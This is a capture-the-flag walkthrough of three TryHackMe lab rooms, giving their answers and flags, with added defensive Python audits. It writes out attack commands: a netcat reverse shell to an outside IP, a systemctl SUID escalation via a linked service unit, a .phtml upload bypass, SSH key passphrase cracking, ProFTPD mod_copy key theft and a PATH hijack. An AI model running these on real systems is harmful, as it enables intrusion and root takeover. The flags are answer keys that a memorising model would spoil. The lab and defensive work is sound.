Tryhackme-Basic Computer Exploitation

Basic Computer Exploitation

Vulnversity ⭐️ reverse shell ⭐️ systemctl privilege escalation

task1 Deploy the machine

No answer needed

task2 Reconnaissance

1.There are many nmap “cheatsheets” online that you can use too.

No answer needed

2.Scan the box, how many ports are open?

6


3.What version of the squid proxy is running on the machine?

3.5.12


4.How many ports will nmap scan if the flag -p-400 was used?

400

5.Using the nmap flag -n what will it not resolve?

DNS

-n disables reverse DNS resolution

6.What is the most likely operating system this machine is running?

Ubuntu


7.What port is the web server running on?

3333

task3 Locating directories using GoBuster

1.What is the directory that has an upload form page?

/internal/


task4 Compromise the webserver

1.Try upload a few file types to the server, what common extension seems to be blocked?

.php


2.Run this attack, what extension is allowed?

.phtml
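The block below is an added example (not code from the room or from this writeup) showing why the form's check fails: a blocklist that rejects only ".php" lets ".phtml" straight through, whereas an allowlist of expected types, a single-extension name and a magic-byte check reject it without having to name every PHP variant. The blocklist function is my reconstruction of the behaviour observed above, not the room's actual code; the magic-byte table and sample inputs are constructed here.

```python
import os
import re

# Extension the weak filter on the upload form rejects: only the literal ".php".
BLOCKED_EXTENSIONS = {".php"}
# A hardened filter accepts a short allowlist instead of rejecting known-bad names.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
# Leading bytes each allowed type must start with (content check, not just the name).
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Bare file name with exactly one extension: no path separators, no double extensions.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")


def blocklist_allows(filename):
    """Reconstruction of the kind of check the form appears to use: reject .php only."""
    return os.path.splitext(filename)[1].lower() not in BLOCKED_EXTENSIONS


def allowlist_allows(filename, data):
    """Hardened check: bare name, one extension, allowlisted type, matching magic bytes."""
    if os.path.basename(filename) != filename or not SAFE_NAME.fullmatch(filename):
        return False      # path components, or double extensions such as shell.php.png
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False      # .phtml and every other unlisted extension is rejected unnamed
    return data.startswith(MAGIC[ext])


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8      # constructed PNG header
    text = b"<?php echo 1;"                       # constructed non-image content
    for name, body in (("photo.png", png), ("shell.php", text), ("shell.phtml", text),
                       ("shell.php.png", png), ("photo.png", text)):
        print(f"{name:14} blocklist={blocklist_allows(name)!s:5} "
              f"allowlist={allowlist_allows(name, body)}")
```

The content check matters as much as the name: a file called photo.png whose bytes begin with "<?php" is rejected even though its extension is allowed.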

3.What is the name of the user who manages the webserver?

bill


4.What is the user flag?


task5 Privilege Escalation

1.On the system, search for all SUID files. What file stands out?

/bin/systemctl

find / -user root -perm -4000 -exec ls -ldb {} \;   (find all files on the system that cannot be accessed)

/bin/systemctl has the SUID bit set and can be used for privilege escalation.

2.It's challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5

www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.

Escalation idea: /bin/systemctl carries the SUID bit, so creating a new service and having systemctl load it executes an arbitrary script as root.
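As an added defensive example (not part of the original writeup), the Python audit below looks for exactly the trace this escalation leaves behind: a unit symlink under /etc/systemd/system whose real file lives outside the normal unit directories, or whose ExecStart= runs something out of /tmp. It builds its own sample tree (constructed here, mirroring the session above) so it runs offline; the trusted unit directories are passed in rather than hard-coded, so on a real host you would pass /etc/systemd/system and /lib/systemd/system.

```python
import os
import tempfile
from pathlib import Path

# World-writable locations a low-privilege user can drop a unit file or script into.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def _under(path, dirs):
    """True if the real path of `path` lies inside any directory in `dirs`."""
    real = os.path.realpath(path)
    return any(real == d or real.startswith(d.rstrip("/") + "/") for d in dirs)


def audit_units(unit_dir, trusted_dirs):
    """Walk unit_dir for *.service entries and report the suspicious ones.

    Two checks, both derived from the systemctl link/enable trick above:
      1. a unit symlink whose real file lives outside the trusted unit dirs
      2. an ExecStart= line that runs something out of a scratch directory
    Returns {unit name: [finding, ...]} for units with at least one finding.
    """
    trusted = tuple(os.path.realpath(d) for d in trusted_dirs)
    report = {}
    for unit in Path(unit_dir).rglob("*.service"):
        findings = []
        if unit.is_symlink() and not _under(unit, trusted):
            findings.append(f"unit file outside trusted dirs: {os.path.realpath(unit)}")
        try:
            text = unit.read_text()
        except OSError as exc:  # dangling symlink or unreadable file
            findings.append(f"unreadable unit: {exc}")
            text = ""
        for line in text.splitlines():
            if line.startswith("ExecStart=") and any(s in line for s in SCRATCH_DIRS):
                findings.append(f"ExecStart runs from a scratch dir: {line}")
        if findings:
            report[unit.name] = findings
    return report


def build_sample_tree():
    """Construct a fake filesystem root mirroring the layout seen in the session above."""
    root = Path(tempfile.mkdtemp(prefix="unit-audit-"))
    etc = root / "etc/systemd/system"
    lib = root / "lib/systemd/system"
    tmp = root / "tmp"
    for d in (etc / "multi-user.target.wants", lib, tmp):
        d.mkdir(parents=True)
    # A distro-shipped unit enabled the normal way: symlink into lib/systemd.
    (lib / "ssh.service").write_text("[Service]\nExecStart=/usr/sbin/sshd -D\n")
    (etc / "multi-user.target.wants" / "ssh.service").symlink_to(lib / "ssh.service")
    # The unit from the session: file in /tmp, linked into /etc/systemd/system.
    rogue = tmp / "tmp.CHTuvfkaoz.service"
    rogue.write_text('[Service]\nType=oneshot\nExecStart=/bin/sh -c "bash /tmp/shell.sh"\n')
    (etc / "tmp.CHTuvfkaoz.service").symlink_to(rogue)
    return etc, [etc, lib]


def demo():
    """Run the audit over the constructed tree and return its report."""
    etc, trusted = build_sample_tree()
    return audit_units(etc, trusted)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

The enabled ssh.service symlink produces no finding because it resolves into a trusted directory; the linked /tmp unit produces two, one for its location and one for its ExecStart=. Removing the SUID bit from systemctl is the actual fix; the audit is for finding out whether the trick has already been used.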

Reference: Tryhackme - Vulnversity

Basic Pentesting

Task1 Web App Testing and Privilege Escalation

1.Deploy the machine and connect to our network

2.Find the services exposed by the machine


3.What is the name of the hidden directory on the web server(enter name without /)?

development


4.Use brute-forcing to find the username & password

5.What is the username?

jan

Obtained by enumerating users with enum4linux.

Share directory: //10.10.76.103/Anonymous


6.What is the password?

armando


7.What service do you use to access the server(answer in abbreviation in all caps)?

SSH

8.Enumerate the machine to find any vectors for privilege escalation

9.What is the name of the other user you found(all lower case)?

kay

10.If you have found another user, what can you do with this information?

Cracking the OpenSSH private key passphrase with john

1.Use ssh2john to convert id_rsa into a format john can read

ssh2john id_rsa > rsacrack

2.Brute-force the private key passphrase with rockyou.txt

john rsacrack --wordlist=<wordlist>
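The step above only works because the key is protected by a passphrase weak enough to sit in rockyou.txt; a key with no passphrase at all would not even need john. The following added example (my code, not the writeup's) is the defender-side check: it reads an OpenSSH private key file and reports whether it is passphrase-protected, by parsing the cipher name in the openssh-key-v1 header, or the Proc-Type header in the legacy PEM format. The sample keys are constructed headers with no real key material.

```python
import base64
import struct

OPENSSH_HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"
OPENSSH_FOOTER = "-----END OPENSSH PRIVATE KEY-----"
AUTH_MAGIC = b"openssh-key-v1\x00"   # magic at the start of the new-format key blob


def _ssh_string(data):
    """Encode bytes as an SSH 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(buf, off):
    """Decode an SSH 'string' at offset off; return (bytes, new offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def key_protection(pem_text):
    """Return (format, cipher) for a private key file; cipher 'none' means no passphrase."""
    lines = [line.strip() for line in pem_text.strip().splitlines()]
    if lines[0] == OPENSSH_HEADER and lines[-1] == OPENSSH_FOOTER:
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(AUTH_MAGIC):
            raise ValueError("openssh-key-v1 magic missing")
        # Header layout: magic, ciphername, kdfname, kdfoptions, number of keys, ...
        cipher, off = _read_ssh_string(blob, len(AUTH_MAGIC))
        return "openssh-key-v1", cipher.decode()
    if lines[0].startswith("-----BEGIN ") and lines[0].endswith(" PRIVATE KEY-----"):
        # Legacy PEM (RSA/DSA/EC): encryption is signalled by a Proc-Type header.
        encrypted = any(line.startswith("Proc-Type: 4,ENCRYPTED") for line in lines[1:4])
        return "legacy-pem", "encrypted" if encrypted else "none"
    raise ValueError("unrecognised private key file")


def is_passphrase_protected(pem_text):
    return key_protection(pem_text)[1] != "none"


def make_sample_openssh_key(cipher, kdf):
    """Construct only the openssh-key-v1 header fields (no key material) for the demo."""
    body = AUTH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(b"")
    body += struct.pack(">I", 0)          # zero keys follow
    b64 = base64.b64encode(body).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"{OPENSSH_HEADER}\n{wrapped}\n{OPENSSH_FOOTER}\n"


# Constructed legacy-format sample: headers only, body is a placeholder.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for label, text in (("aes256-ctr/bcrypt", make_sample_openssh_key(b"aes256-ctr", b"bcrypt")),
                        ("unencrypted", make_sample_openssh_key(b"none", b"none")),
                        ("legacy PEM", LEGACY_ENCRYPTED)):
        print(label, key_protection(text), "protected" if is_passphrase_protected(text) else "EXPOSED")
```

Run over the .ssh directories of an estate, this turns "a private key leaked from a share" into either "attacker still needs the passphrase" or "attacker has the account now", which is the distinction that decides how urgently the key must be rotated.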


11.What is the final password you obtain?

heresareallystrongpasswordthatfollowsthepasswordpolicy$$


Kenobi ⭐️ SMB

task1 Deploy the vulnerable machine

1.Make sure you’re connected to our network and deploy the machine

2.Scan the machine with nmap, how many ports are open?

7


task2 Enumerating Samba for shares

1.Using the nmap command above, how many shares have been found?

3


Scan port 445 with the SMB enumeration scripts:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.162.162

2.On most distributions of Linux smbclient is already installed. Let's inspect one of the shares.

smbclient //<ip>/anonymous

Once you're connected, list the files on the share. What file can you see?

log.txt


3.Open the file on the share. There are a few interesting things to be found:

  • Information generated for Kenobi when generating an SSH key for the user
  • Information about the ProFTPD server.

What port is FTP running on?

21


4.Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program numbers into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it's prepared to serve.

In our case, port 111 is access to a network file system. Let's use nmap to enumerate this.

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount MACHINE_IP

What mount can we see?

/var


task3 Gain initial access with ProFtpd ⭐️ProFtpd

1.Let's get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.

What is the version?

1.3.5


2.We can use searchsploit to find exploits for a particular software version.

Searchsploit is basically just a command line search tool for exploit-db.com.

How many exploits are there for the ProFTPd running?

3


3.You should have found an exploit from ProFtpd’s mod_copy module.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.

From log.txt we learn the location of the key and the location of the share.


Connect to port 21 with nc:

nc 10.10.34.242 21

Then run the commands below to copy the key file into the share directory, download it, and log in to the kenobi account with the key.

site cpfr /home/kenobi/.ssh/id_rsa
site cpto /home/kenobi/share/id_rsa
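Beyond patching ProFTPD, the defender's question for this step is whether the copy has already happened. The following added example (mine, not from the writeup) pairs SITE CPFR and SITE CPTO commands per client in a command log and flags copies that were made by an unauthenticated session or that read from key or configuration locations. The log lines are constructed for the demo in an assumed "client user [time] "command" reply-code" layout, not output captured from the Kenobi machine; adjust LINE_RE to whatever ExtendedLog format your server actually writes.

```python
import re

# Constructed command-log lines for the demo (assumed layout, not a real capture).
SAMPLE_LOG = """\
10.9.23.70 - [13/Jul/2021:18:21:30 +0000] "SITE CPFR /home/kenobi/.ssh/id_rsa" 350
10.9.23.70 - [13/Jul/2021:18:21:41 +0000] "SITE CPTO /home/kenobi/share/id_rsa" 250
10.10.10.5 kenobi [13/Jul/2021:18:25:12 +0000] "RETR notes.txt" 226
10.10.10.5 kenobi [13/Jul/2021:18:26:02 +0000] "SITE CPFR /home/kenobi/report.pdf" 350
10.10.10.5 kenobi [13/Jul/2021:18:26:07 +0000] "SITE CPTO /home/kenobi/backup/report.pdf" 250
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<cmd>[^"]*)" (?P<status>\d{3})$'
)
# Path fragments whose copying is never part of normal FTP use.
SENSITIVE_PATTERNS = ("/.ssh/", "/etc/", "/root/")


def parse_copy_events(log_text):
    """Pair SITE CPFR / SITE CPTO commands per client and return the resulting copies."""
    pending = {}   # client -> (user, source path) after an accepted CPFR (reply 350)
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = m["cmd"].split(" ", 2)
        if len(parts) < 3 or parts[0].upper() != "SITE":
            continue
        sub, arg = parts[1].upper(), parts[2]
        if sub == "CPFR" and m["status"] == "350":
            pending[m["client"]] = (m["user"], arg)
        elif sub == "CPTO" and m["client"] in pending:
            user, src = pending.pop(m["client"])
            events.append({
                "client": m["client"], "user": user, "src": src, "dst": arg,
                "time": m["time"],
                # Unauthenticated copies, or copies out of key/config paths, are the signal.
                "suspicious": user == "-" or any(p in src for p in SENSITIVE_PATTERNS),
            })
    return events


def suspicious_copies(log_text):
    """Only the copy events worth alerting on."""
    return [e for e in parse_copy_events(log_text) if e["suspicious"]]


if __name__ == "__main__":
    for e in parse_copy_events(SAMPLE_LOG):
        flag = "ALERT" if e["suspicious"] else "ok   "
        print(f"{flag} {e['client']} user={e['user']} {e['src']} -> {e['dst']}")
```

The authenticated kenobi session copying its own report is reported but not flagged; the anonymous session copying .ssh/id_rsa into the share is.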


4.We knew that the /var directory was a mount we could see (task 2, question 4). So we’ve now moved Kenobi’s private key to the /var/tmp directory.

5.Mount the /var export and list it:

mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

What is Kenobi’s user flag (/home/kenobi/user.txt)?

d0b0f3f53b6caa532a83915e19224899


task4 Privilege Escalation with Path Variable Manipulation ⭐️ PATH variable privilege escalation

1.To search the system for these types of files run the following: find / -perm -u=s -type f 2>/dev/null

What file looks particularly out of the ordinary?

/usr/bin/menu

2.Run the binary, how many options appear?

3


3.We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, it's using our path variable to find the “curl” binary… which is actually a copy of /bin/sh, and as this file is run as root it runs our shell as root!

Escalation condition: -rwsr-xr-x menu (the binary is SUID root)

When the binary runs it looks up curl through the PATH environment variable. Create your own curl file, make it executable, place it in a writable directory, and add that directory to PATH so it replaces the real curl program and is executed as root.

export PATH=/tmp:$PATH   (prepends /tmp to PATH)
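To make the failure mode concrete from the defender's side, here is an added example (my code, not the room's) that audits a PATH value for entries an attacker can plant a file in, and shows which file a bare command name like "curl" resolves to under a hijackable PATH versus a hardened one. It constructs its own world-writable and normal directories under a temp root so it runs offline; the directory names and the stub files inside them are constructed for the demo.

```python
import os
import stat
import tempfile
from pathlib import Path


def audit_path(path_value):
    """Return (entry, reason) pairs for PATH entries that a SUID program should never trust."""
    findings = []
    for entry in path_value.split(os.pathsep):
        if entry == "" or not os.path.isabs(entry):
            findings.append((entry, "relative or empty entry (resolves to the current directory)"))
            continue
        try:
            mode = os.stat(entry).st_mode
        except FileNotFoundError:
            findings.append((entry, "missing directory (whoever can create it controls it)"))
            continue
        if mode & stat.S_IWOTH:          # sticky bit or not, anyone can add files here
            findings.append((entry, "world-writable directory"))
    return findings


def resolve_command(name, path_value):
    """Return the file a bare command name resolves to under path_value, or None."""
    for entry in path_value.split(os.pathsep):
        candidate = Path(entry or ".") / name
        if candidate.is_file() and os.access(candidate, os.X_OK):
            return str(candidate)
    return None


def build_sample():
    """Construct a /tmp-like scratch dir and a normal bin dir, each holding a 'curl' stub."""
    root = Path(tempfile.mkdtemp(prefix="path-audit-"))
    scratch, bindir = root / "scratch", root / "bin"
    scratch.mkdir()
    bindir.mkdir()
    os.chmod(scratch, 0o1777)            # same mode as /tmp
    os.chmod(bindir, 0o755)
    for d, msg in ((bindir, "real curl"), (scratch, "planted file")):
        stub = d / "curl"
        stub.write_text(f"#!/bin/sh\necho {msg}\n")   # harmless stubs for the demo
        stub.chmod(0o755)
    return str(scratch), str(bindir)


def demo():
    """Compare a hijackable PATH (scratch dir first) with a hardened one (bin dir only)."""
    scratch, bindir = build_sample()
    hijackable = scratch + os.pathsep + bindir
    hardened = bindir
    return {
        "findings": audit_path(hijackable),
        "curl_under_hijackable_path": resolve_command("curl", hijackable),
        "curl_under_hardened_path": resolve_command("curl", hardened),
        "expected_real_curl": os.path.join(bindir, "curl"),
    }


if __name__ == "__main__":
    r = demo()
    for entry, reason in r["findings"]:
        print(f"PATH entry {entry}: {reason}")
    print("hijackable PATH resolves curl to", r["curl_under_hijackable_path"])
    print("hardened   PATH resolves curl to", r["curl_under_hardened_path"])
```

The hardening for a SUID program like /usr/bin/menu is not a better PATH at all but calling /usr/bin/curl by absolute path (or resetting PATH to a fixed value before any execve); the audit above is for confirming that an inherited PATH was the problem.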

4.What is the root flag (/root/root.txt)?

177b3cd8562289f37382721c28381f02
